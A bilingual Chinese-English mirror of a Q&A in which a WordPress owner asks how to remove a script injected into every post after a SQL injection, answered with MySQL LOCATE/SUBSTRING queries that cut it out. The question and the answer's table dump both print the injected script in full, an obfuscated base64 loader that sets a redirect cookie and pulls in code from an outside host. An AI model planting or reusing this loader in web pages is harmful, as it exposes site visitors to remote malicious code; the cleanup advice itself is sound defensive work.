如何从 sql 注入攻击中删除帖子中的脚本? [英] How to remove scripts in posts from an sql injection attack?
问题描述
我有一个插件,使我的 Wordpress 站点容易受到 SQL 注入攻击.我已经锁定了我的网站并删除了所有 Wordpress 文件,然后重新安装了 Wordpress.该插件也已被删除.不幸的是,我现在安装了以下示例脚本的所有 2503 个帖子:
I had a plugin that made my Wordpress site vulnerable to SQL injection attack. I've since locked down my site and removed all Wordpress files then reinstalled Wordpress. The plugin has also since been removed. Unfortunately I now have all 2503 posts with the following example script installed:
<!--codes_iframe-->
<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>
<!--/codes_iframe-->
问题是,当我搜索特定脚本时,每个帖子的 base64 字符串都不同.所以我不能只是做一个查找和替换/删除.
The problem is, when I search for the particular script the base64 string is different for every post. So I can't just do a find and replace/remove.
我的想法是,由于脚本的开头和结尾实际上是注释的,所以数据库查询不能以某种方式删除它们之间的代码,然后第二个查询删除注释吗?如果是这样,我在任何地方都找不到.这似乎很容易做到,但显然(根据 Google 的说法)它非常复杂.
My thought was, since the beginning and ending of the script is actually commented, couldn't a database query somehow remove the code between them then a second query remove the comments? If so I can't find this anywhere. It seems easy to do, but apparently (according to Google) it's quite complicated.
希望有人能有程序上的补救措施.同时,我将手动执行此删除操作,希望有人能帮我节省一些时间.
Hopefully someone will have a procedural remedy. In the meantime, I'll be doing this removal manually with the hopes that someone can save me some time.
推荐答案
MySQL 8.0 引入了一个新功能 REGEXP_REPLACE() 但如果您使用的是较早版本的 MySQL,则可以使用 LOCATE() 找到文本中的开始和结束位置,然后将这两个位置之间的内容切掉.
MySQL 8.0 introduces a new function REGEXP_REPLACE() but if you are using an earlier version of MySQL, you could use LOCATE() to find the start and end position in the text, and then chop out the content between those two positions.
我对此进行了测试 - 我创建了一个表 wp_mytable 并将您的违规文本放入其中,前后各有一些文本.
I tested this out — I created a table wp_mytable and put your offending text into it, with a bit of text before and after.
mysql> select * from wp_mytable\G
*************************** 1. row ***************************
id: 1
txt: ABC 123
<!--codes_iframe-->
<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script>
<!--/codes_iframe-->
And that's all, folks.
1 row in set (0.00 sec)
LOCATE() 可以找到开始和结束标签:
LOCATE() can find the open and close tags:
mysql> SELECT LOCATE('<!--codes_iframe-->', txt) as start from wp_mytable;
+-------+
| start |
+-------+
| 9 |
+-------+
mysql> SELECT LOCATE('<!--/codes_iframe-->', txt) as end from wp_mytable;
+------+
| end |
+------+
| 830 |
+------+
现在,如果我们将 txt 替换为位置 9 之前和位置 830+LENGTH('<!--/codes_iframe-->'),这将删除问题内容.
Now if we replace txt with the content before position 9, and after position 830+LENGTH('<!--/codes_iframe-->'), that will remove the problem content.
先用 SELECT 测试一下:
Test it out first with SELECT:
mysql> SELECT
SUBSTRING(txt, 1, LOCATE('<!--codes_iframe-->', txt)-1) AS pre_txt,
SUBSTRING(txt, LOCATE('<!--/codes_iframe-->', txt)+LENGTH('<!--/codes_iframe-->')) AS post_txt
FROM wp_mytable\G
*************************** 1. row ***************************
pre_txt: ABC 123
post_txt:
And that's all, folks.
当我们确信这是正确的子字符串时,将这些片段连接在一起并在更新中使用它们:
When we're confident that's the right substring, concatenate the pieces together and use them in an UPDATE:
mysql> UPDATE wp_mytable SET txt = CONCAT(
SUBSTRING(txt, 1, LOCATE('<!--codes_iframe-->', txt)-1),
SUBSTRING(txt, LOCATE('<!--/codes_iframe-->', txt)+LENGTH('<!--/codes_iframe-->')))
WHERE LOCATE('<!--codes_iframe-->', txt) > 0;
与往常一样,在尝试此类手术之前备份您的数据.
As always, make a backup of your data before attempting this type of surgery.
我还想到,您应该在完成此替换后再次搜索数据,以防违规脚本在给定文本中插入两次.替换方法只删除第一次出现,但你想要那个.您不希望删除两次脚本之间的合法文本.
It also occurs to me that you should search the data again after you've done this replacement, in case the offending script was inserted twice within a given text. The replacement method only removes the first occurrence, but you want that. You wouldn't want to remove the legitimate text in between two occurrences of the script.
顺便说一下,得知您遭到 SQL 注入攻击,我深感遗憾.人们有时很糟糕.
By the way, I'm sorry to hear you got hacked with an SQL injection attack. People suck sometimes.
这篇关于如何从 sql 注入攻击中删除帖子中的脚本?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
